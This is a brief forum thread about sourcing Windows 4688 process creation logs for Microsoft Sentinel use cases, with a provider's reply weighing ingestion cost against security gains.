Forum Discussion
Log sources for process creation (4688) events from endpoints
Hi I noticed that lots of the use cases in Sentinel are driven by process creation events - 4688 in the Security event log; suspicious Powershell command lines, for example. Is Microsoft's id...
Not a solution, but just sharing my thoughts...
Capturing all the process creation events from ALL endpoints would be prohibitive from a cost perspective. For this reason, I'm only considering deploying the agent on endpoints with suspicious behavior though this is not an optimal approach. Relying on Defender ATP is not an option as many of our customers have significant investments in endpoint protection and replacing them with Defender ATP would be a long sales and engineering effort. As it is, we need to balance costs of ingesting this data vs. the increase in security posture.
Regards,
Adrian Grigorof
Managed Sentinel Inc.
http://www.managedsentinel.com